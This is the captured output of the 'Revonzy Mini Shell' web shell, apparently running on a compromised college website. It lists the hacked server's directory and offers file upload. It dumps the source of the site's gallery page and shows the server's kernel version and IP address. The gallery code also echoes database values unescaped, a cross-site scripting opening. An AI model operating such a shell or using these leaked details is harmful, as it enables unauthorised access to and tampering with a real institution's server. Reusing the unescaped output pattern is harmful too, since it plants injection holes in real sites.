Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/gallery1.php

<!--
	Powered By - Dream Technology, Solapur.
	Contact No : +91 9595775120
	Email ID - dream.technology@outlook.com
-->
<?php
	require_once("admin/lib/functions.php");
	$db = new login_function();
?>	
<DOCTYPE html>
<html>
<head>

  
	<title>Laxmibai Bhaurao Patil Mahila Mahavidyalaya</title>
	<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />
	<link href="css/jquery.lightbox-0.5.css" rel="stylesheet" type="text/css" media="all" />
    
	<script src="js/jquery.js.pagespeed.jm.ZzSiN_5Whq.js"></script>
<script src="js/bootstrap.js%2bholder.js%2bjquery.mousewheel-3.0.6.pack.js.pagespeed.jc.TDU1MtO3PK.js"></script><script>eval(mod_pagespeed_v0V0sNbopj);</script>
<script>eval(mod_pagespeed_$q8qcT18Q7);</script>
<!-- Add mousewheel plugin-->
<script>eval(mod_pagespeed_9uU4mQzqKY);</script>
	<style>
	table a:link {
	color: #666;
	font-weight: bold;
	text-decoration:none;
}
table a:visited {
	color: #999999;
	font-weight:bold;
	text-decoration:none;
}
table a:active,
table a:hover {
	color: #bd5a35;
	text-decoration:underline;
}
table {
	font-family:Montserrat Alternates;
	color:#666;
	font-size:12px;
	text-shadow: 1px 1px 0px #fff;
	background:#eaebec;
	margin:20px;
	border:#ccc 1px solid;

	-moz-border-radius:3px;
	-webkit-border-radius:3px;
	border-radius:3px;

	-moz-box-shadow: 0 1px 2px #d1d1d1;
	-webkit-box-shadow: 0 1px 2px #d1d1d1;
	box-shadow: 0 1px 2px #d1d1d1;
}
table th {
	padding:21px 25px 22px 25px;
	border-top:1px solid #fafafa;
	border-bottom:1px solid #e0e0e0;

	background: #ededed;
	background: -webkit-gradient(linear, left top, left bottom, from(#ededed), to(#ebebeb));
	background: -moz-linear-gradient(top,  #ededed,  #ebebeb);
}
table th:first-child {
	text-align: left;
	padding-left:20px;
}
table tr:first-child th:first-child {
	-moz-border-radius-topleft:3px;
	-webkit-border-top-left-radius:3px;
	border-top-left-radius:3px;
}
table tr:first-child th:last-child {
	-moz-border-radius-topright:3px;
	-webkit-border-top-right-radius:3px;
	border-top-right-radius:3px;
}
table tr {
	text-align: center;
	padding-left:20px;
}
table td:first-child {
	text-align: left;
	padding-left:20px;
	border-left: 0;
}
table td {
	padding:18px;
	border-top: 1px solid #ffffff;
	border-bottom:1px solid #e0e0e0;
	border-left: 1px solid #e0e0e0;

	background: #fafafa;
	background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
	background: -moz-linear-gradient(top,  #fbfbfb,  #fafafa);
}
table tr.even td {
	background: #f6f6f6;
	background: -webkit-gradient(linear, left top, left bottom, from(#f8f8f8), to(#f6f6f6));
	background: -moz-linear-gradient(top,  #f8f8f8,  #f6f6f6);
}
table tr:last-child td {
	border-bottom:0;
}
table tr:last-child td:first-child {
	-moz-border-radius-bottomleft:3px;
	-webkit-border-bottom-left-radius:3px;
	border-bottom-left-radius:3px;
}
table tr:last-child td:last-child {
	-moz-border-radius-bottomright:3px;
	-webkit-border-bottom-right-radius:3px;
	border-bottom-right-radius:3px;
}
table tr:hover td {
	background: #f2f2f2;
	background: -webkit-gradient(linear, left top, left bottom, from(#f2f2f2), to(#f0f0f0));
	background: -moz-linear-gradient(top,  #f2f2f2,  #f0f0f0);	
}
	</style>
	<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>
</head>
<body>	
	
	<?php
		require_once("lib/header.php");
	?>
		
	<div name="tab_container">
		<div class="main_container">
		
		<div class="page_highlighter" style="background-color:orange">Gallery</div>
			
			<?php
				require_once("highlights.php");
			?>
			
			<div class="data_container" style="margin-top:16px; min-height:700px;">
					<h2><em><span style="color:red;font-size:20px;">Gallery Images:</span></em></h2>

<div id="thumbnails"> 
        
	
									<?php
									
										$report_details = $db->get_all_gallery_imagess();
										if(!empty($report_details))
										{
											$counter =0;
											foreach($report_details as $record)
											{
												$id		=	$report_details[$counter][0];
												$images			=	$report_details[$counter][1];
												$description	=	$report_details[$counter][2];
												?>
												<div class="imagg" style="display:inline-table; width:205px; font-size:12px; margin:10px;">
												<a href="/gallery/<?php echo $images; ?>" target="_blank"><img src="/gallery/<?php echo $images; ?>" height="200px" width="200px" style="border:1px solid #ccc;padding:5px;margin:10px;"><br />
												<div style="border:0px solid black;text-align:center;color:Black;"><?php echo $description; ?></div>
												</a>
												</div>
												<?php
												$counter++;
											}
										}
									?>
			
				</div>	
	
	</div>
		</div>
	</div>
			
	<?php
		require_once("lib/footer.php");
	?>
<script type="text/javascript" src="js/jquery.js"></script>
<script type="text/javascript" src="js/jquery.lightbox-0.5-mod.js"></script>
 
<script type="text/javascript">
$(function() {
    $('#thumbnails a').lightBox();
});
</script>


</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4